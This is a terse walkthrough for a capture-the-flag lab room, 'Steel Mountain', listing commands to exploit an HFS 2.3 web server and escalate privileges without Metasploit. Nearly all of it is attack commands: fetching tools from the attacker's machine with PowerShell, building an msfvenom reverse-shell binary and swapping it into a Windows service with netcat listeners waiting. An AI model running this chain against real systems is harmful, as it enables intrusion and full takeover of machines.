TryHackMe — Steel Mountain w/o MSF
Utilize PowerShell commands and winPEAS to enumerate the system and collect the relevant information to escalate privilege.
Machine Information:
[1]NMAP Scan
sudo nmap -A -T -p- 10.10.255.1 -oN nmap_scan
[2]Research vulnerability
searchsploit hfs 2.3
searchsploit -x 39161.py
[3]Edit exploit
[4]Setup HTTP server to serve nc.exe and winPEAS
sudo python -m SimpleHTTPServer 80
[5]Setup a netcat listener then run exploit
nc -lvnp 4444
python exploit.py 10.10.255.1 8080
[6]Download winPEAS for Privilege Escalation
powershell -c “Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe”
[7]Run winPEAS
winPEAS.exe
[8]Create msfvenom payload and setup a netcat listener
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe
nc -lvnp 1234
[9]Stop service
sc stop AdvancedSystemCareService9
[10]Download payload under the directory of the target service then start service
powershell -c “Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"
sc start AdvancedSystemCareService9
References:
https://tryhackme.com/room/steelmountain
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
